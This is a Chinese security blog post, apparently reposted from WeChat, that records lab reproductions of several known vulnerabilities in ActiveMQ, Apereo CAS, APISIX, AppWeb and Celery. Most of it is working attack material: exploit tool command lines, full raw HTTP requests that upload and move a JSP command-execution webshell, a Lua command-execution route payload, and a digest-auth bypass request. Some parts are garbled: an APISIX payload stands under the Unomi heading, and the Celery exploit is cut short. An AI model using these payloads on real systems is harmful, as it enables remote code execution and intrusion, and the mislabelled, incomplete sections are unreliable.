因为是记录向就不做太多的分析了
最近在鼓捣了个vul hub玩,就顺手弄了个复现
各位师傅看个乐呵就好了
CVE-2015-5254(ActiveMQ Deserialization vulnerability)
vulnerability describes
Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。
Download the Poc(use wget)
wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jarfind what port we need use
visit the
localhost:8161
and use admin/admin to login on page localhost:8161/admin/
use poc,and you need to login actvemq to click a queue named event to let vulnerability active , after that you can go to your docker to check which dir named tmp created successfully
expsandpocs % java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME localhost 61616you can also use ysoseria to build a deserialization object reverse shell payload and send the payload to activemq server and wait administrator click it to get shell 
ysoserial使用方法
https://ccship.cn/2021/10/21/ysoserial使用方法/
CVE_2016-3088(ActiveMQ arbitary files write vulnerability)
vulnerability describes
该漏洞出现在fileserver应用中,漏洞原理:ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fileserver下,然后再通过Move指令移动到可执行目录下访问。影响版本Apache ActiveMQ 5.0.0 - 5.13.2
use PUT method to upload a jsp webshell
PUT /fileserver/a.jsp HTTP/1.1Host: localhost:8161Destination:file:///opt/activemq/webapps/api/a.jspCache-Control: max-age=0Authorization: Basic YWRtaW46YWRtaW4=sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"sec-ch-ua-mobile: ?0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost:8161/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=1qjva0ng7sf7y1c0chktg5cwzqConnection: closeContent-Length: 399<%@ page import="java.io.*" %><%try {String cmd = request.getParameter("cmd");Process child = Runtime.getRuntime().exec(cmd);InputStream in = child.getInputStream();int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();try {child.waitFor();} catch (InterruptedException e) {e.printStackTrace();}} catch (IOException e) {System.err.println(e);}%>
and we need to know it's absolute path to use the MOVE method to redirect the page to a parsed page
—————————
ActiveMQ Absolute path leakage
Request Raw:PUT /fileserver/a../../%08/..%08/.%08/%08 HTTP/1.1Host:localhost:8161Authorization: Basic YWRtaW46YWRtaW4=Content-Length: 4
MOVE /fileserver/a.jsp HTTP/1.1Host: localhost:8161Destination:file:///opt/activemq/webapps/api/a.jspCache-Control: max-age=0Authorization: Basic YWRtaW46YWRtaW4=sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"sec-ch-ua-mobile: ?0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost:8161/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=1qjva0ng7sf7y1c0chktg5cwzqConnection: closeContent-Length: 399<%@ page import="java.io.*" %><%try {String cmd = request.getParameter("cmd");Process child = Runtime.getRuntime().exec(cmd);InputStream in = child.getInputStream();int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();try {child.waitFor();} catch (InterruptedException e) {e.printStackTrace();}} catch (IOException e) {System.err.println(e);}%>
finally you can find a.jsp in your docker /webapp/api/
apereo-cas-4.1-rce
Vulnerability describes
Apereo CAS是2002年耶鲁大学实验室推出的一个开源统一认证服务,CAS即Central Authentication Service,其漏洞成因在于Webflow中使用了默认密钥changeit,攻击者可通过默认密钥触发反序列化漏洞,实现RCE。影响版本4.1.x-4.1.6
use tool
https://github.com/vulhub/Apereo-CAS-Attack
create payload
java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/success"
use payload
CVE-2020-13945
Vulnerability describes
Apache Unomi是一个Java开源数据平台,这是一个Java服务器,旨在管理客户,潜在顾客和访问者的数据,并帮助个性化客户体验。Unomi可用于在非常不同的系统(例如CMS,CRM,问题跟踪器,本机移动应用程序等)中集成个性化和配置文件管理。在Apache Unomi 1.5.1版本之前,攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码执行。
POST /apisix/admin/routes HTTP/1.1Host:localhost:9080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: closeX-API-KEY: edd1c9f034335f136f87ad84b625c8f1Content-Type: application/jsonContent-Length: 406{"uri": "/attack","script": "local _M = {} n function _M.access(conf, ctx) n local os = require('os')n local args = assert(ngx.req.get_uri_args()) n local f = assert(io.popen(args.cmd, 'r'))n local s = assert(f:read('*a'))n ngx.say(s)n f:close() n end nreturn _M","upstream": {"type": "roundrobin","nodes": {"example.com:80": 1}}}
CVE-2018-8715
AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。他使用C/C++来编写,能够运行在几乎先进所有流行的操作系统上。当然他最主要的应用场景还是为嵌入式设备提供Web Application容器。
其7.0.3之前的版本中,对于digest和form两种认证方式,如果用户传入的密码为`null`(也就是没有传递密码参数),appweb将因为一个逻辑错误导致直接认证成功,并返回session。
PoC
GET / HTTP/1.1Host: localhost:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeAuthorization: Digest username=admin
get session id
1::http.session::b521b677a521ebf5b1d34e6a2217da05
use sission to login
CVE-2021-23727
Celery 是一个简单、灵活且可靠的分布式系统,用于处理大量消息,同时为操作提供维护此类系统所需的工具。它是一个专注于实时处理的任务队列,同时也支持任务调度。在Celery < 4.0版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在未授权访问问题时,可利用Pickle反序列化漏洞执行任意代码。
PoC
from celery import Celeryapp = Celery('tasks', broker='redis://redis/0',backend='redis://redis/1')app.conf['CELERY_ACCEPT_CONTENT'] = ['pickle', 'json', 'msgpack', 'yaml']def add(x, y):return x + y
python3 exp.py loaclhost
水篇文章(逃
英语太烂了还懒得切输入法
过阵子想细分析一下log4j2
先学好java(逃
原文始发于微信公众号(凛夜安全团队):几个vulhub的漏洞复现(记录向)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论